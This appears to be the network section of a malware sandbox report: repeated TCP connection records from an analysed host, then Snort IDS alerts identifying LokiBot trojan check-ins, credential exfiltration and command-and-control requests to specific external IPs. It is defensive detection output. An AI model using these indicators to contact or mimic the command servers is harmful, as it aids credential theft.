Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.9:80
Source: global traffic	TCP traffic: 188.114.96.9:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.9:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.9:80
Source: global traffic	TCP traffic: 188.114.96.9:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.9:80
Source: global traffic	TCP traffic: 188.114.96.9:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.96.9:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.96.9:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.9:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.96.9:80
Source: global traffic	TCP traffic: 188.114.96.9:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.9:80
Source: global traffic	TCP traffic: 188.114.97.9:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.9:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.9:80
Source: global traffic	TCP traffic: 188.114.97.9:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.9:80
Source: global traffic	TCP traffic: 188.114.97.9:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 188.114.97.9:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.9:80
Source: global traffic	TCP traffic: 188.114.97.9:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.97.9:80
Source: global traffic	TCP traffic: 188.114.97.9:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 188.114.97.3:80
Source: global traffic	TCP traffic: 188.114.97.3:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:80
Source: global traffic	TCP traffic: 188.114.96.3:80 -> 192.168.2.22:49172

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49164 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49164 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49164 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49164 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49164 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49165 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49165 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49165 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49165 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49165 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49166 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49166 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49166 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49166 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49166 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49167 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49167 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49167 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49167 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49167 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49168 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49168 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49168 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49169 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49169 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49169 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49169 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49169 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49170 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49170 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49170 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49170 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49170 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49171 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49171 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49171 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49171 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49171 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49172 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49172 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49172 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49172 -> 188.114.96.3:80
